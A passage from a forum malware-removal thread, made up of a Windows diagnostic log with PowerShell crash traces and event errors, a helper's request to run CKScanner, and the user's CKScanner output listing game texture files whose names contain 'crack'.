   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (10/23/2014 05:33:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c0000005048f38d0482401cfef0904e14f20C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknown49fc7778-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:33:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (10/23/2014 05:11:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888aKERNELBASE.dll6.2.9200.1645150988950000006a600014b32ec7c01cfef05ca21738dC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\KERNELBASE.dll263c0aba-5af9-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:09:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0612801cfef059b781fa1C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlle337a2e5-5af8-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 04:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0188e401cfef02e36e2bfbC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll2408d701-5af6-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 04:47:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Steam.exe2.45.19.8154457aa7unknown0.0.0.000000000c000041d04b1098c243801cfef02375bf9e6C:\Program Files (x86)\Steam\Steam.exeunknowncda71694-5af5-11e4-bf1c-3085a9a720f7
 
 
CodeIntegrity Errors:
===================================
  Date: 2013-12-16 21:57:35.239
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-16 21:57:26.378
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:33.532
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-12-12 20:46:09.428
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:31.388
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-29 11:23:10.452
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:36.351
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-11-03 09:46:17.007
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:24.425
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2013-10-21 16:17:18.107
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: AMD A8-5500 APU with Radeon™ HD Graphics 
Percentage of memory in use: 83%
Total physical RAM: 8156.38 MB
Available physical RAM: 1323.22 MB
Total Pagefile: 16348.38 MB
Available Pagefile: 7349.44 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:918.55 GB) (Free:34.85 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (Tablet_CD) (CDROM) (Total:0.12 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5F075A5E)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#10 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 24 October 2014 - 01:31 AM


ckscanner.jpg Scan with CKScanner

Download CKScanner by askey127 and save it to your desktop.

  • Right-click on ckscanner.jpg icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • click Search For Files.
  • When finished, click Save List To File.
  • Remember to run this tool once only, if not asked to run it again.

Please include the content of CKFiles.txt in your next reply.


Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#11 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 25 October 2014 - 03:04 PM

CKScanner stops responding when I click Search For Files



#12 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 26 October 2014 - 05:16 AM

Strange. Please reboot macvhine and try again.


Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#13 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 26 October 2014 - 08:08 PM

CKScanner 2.4 - Additional Security Risks - These are not necessarily bad
c:\games\fallout new vegas\data\meshes\new vegas bounties ii\remington_cracker.nif
c:\games\fallout new vegas\data\textures\architecture\suburban\crackedplaster01.dds
c:\games\fallout new vegas\data\textures\architecture\suburban\crackedplaster01_n.dds
c:\games\fallout new vegas\data\textures\architecture\suburban\crackedplaster02.dds
c:\games\fallout new vegas\data\textures\architecture\suburban\crackedplaster02_n.dds
c:\games\fallout new vegas\data\textures\architecture\urban\crackdecal03.dds
c:\games\fallout new vegas\data\textures\architecture\urban\crackdecal03_n.dds
c:\games\fallout new vegas\data\textures\architecture\urban\lightcracks.dds
c:\games\fallout new vegas\data\textures\dlc04\architecture\boardwalk\boardwalkcrackdecals.dds
c:\games\fallout new vegas\data\textures\dlc04\architecture\boardwalk\boardwalkcrackdecals_n.dds
c:\games\fallout new vegas\data\textures\dungeons\metro\platforms\platformcracks01.dds
c:\games\fallout new vegas\data\textures\dungeons\metro\platforms\platformcracks01_n.dds
c:\games\fallout new vegas\data\textures\eve\effects\glasscracks.dds
c:\games\fallout new vegas\data\textures\landscape\crackeddirtwastes01.dds
c:\games\fallout new vegas\data\textures\landscape\crackeddirtwastes01_n.dds
c:\games\fallout new vegas\data\textures\new vegas bounties ii\remington_a_cracker_cowboy.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack1.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack2.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack3.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack4.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack5.dds
c:\games\fallout new vegas\data\textures\pnx\hud\visor\crack6.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack1.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack2.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack3.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack4.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack5.dds
c:\games\nexus mod manager\falloutnv\install info\overwrites\data\textures\pnx\hud\visor\2qyiwqyl_crack6.dds
c:\games\tsev skyrim le\data\textures\dlc01\landscape\icelakesnowcracks.dds
c:\games\tsev skyrim le\data\textures\dlc02\effects\fxcrackstile02.dds
c:\program files (x86)\jack claw\data\models\terrain_objects\decals\damage\crack_01.s3d
c:\program files (x86)\jack claw\data\models\terrain_objects\decals\damage\crack_02.s3d
c:\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures\wu folder\crackling wu.stk
c:\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack2_piv2.stk
c:\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\crack_sidewaysbox.stk
c:\program files (x86)\pivot stickfigure animator\stick figures\pivot\stick figures 2\background accessories\buildings\crack.stk
c:\program files (x86)\six projects\six updater\tools\bin\ssh-keygen.exe
c:\program files (x86)\steam\steamapps\9tony913\garrysmod\garrysmod\addons\css content addon\materials\concrete\prodwllecracked.vmt
c:\program files (x86)\steam\steamapps\9tony913\garrysmod\garrysmod\addons\css content addon\materials\concrete\prodwllecracked.vtf
c:\program files (x86)\steam\steamapps\9tony913\garrysmod\garrysmod\downloads\materials\models\mcmodelpack\stonebrick-cracked.vmt
c:\program files (x86)\steam\steamapps\9tony913\garrysmod\garrysmod\downloads\materials\models\mcmodelpack\stonebrick-cracked.vtf
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\.rsync\.pack\addons\acex_sm_c_sound_wep_crack.pbo.acex_sm.bisign.gz
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\.rsync\.pack\addons\acex_sm_c_sound_wep_crack.pbo.gz
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\.rsync\.pack\addons\acex_sm_s_wep_crack.pbo.acex_sm.bisign.gz
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\.rsync\.pack\addons\acex_sm_s_wep_crack.pbo.gz
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\addons\acex_sm_c_sound_wep_crack.pbo
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\addons\acex_sm_c_sound_wep_crack.pbo.acex_sm.bisign
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\addons\acex_sm_s_wep_crack.pbo
c:\program files (x86)\steam\steamapps\common\arma 2 operation arrowhead\@acex_sm\addons\acex_sm_s_wep_crack.pbo.acex_sm.bisign
c:\program files (x86)\steam\steamapps\common\arma 3\@sound\addons\speedofsound_ballisticcracks.pbo
c:\program files (x86)\steam\steamapps\common\arma 3\@sound\addons\speedofsound_ballisticcracks.pbo.sos.bisign
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\brick_building_dmg\fx_collapse\panel_crack_brick_group_combo_00.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\brick_building_dmg\fx_collapse\panel_crack_brick_group_combo_01_brown.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\metal_building_dmg\fx_collapse\panel_crack_metal_group_combo_00.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\shingle_building_dmg\fx_collapse\panel_crack_shingle_group_combo_00.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\stone\stone_bridge_cracking.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\stone\stone_bridge_cracking_combo.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\stone\stone_bridge_cracking_combo_02.bfx
c:\program files (x86)\steam\steamapps\common\company of heroes relaunch\moderncombat\data\art\fx\fx_damage\stone\nis_library\stone_bridge_cracking_nis.bfx
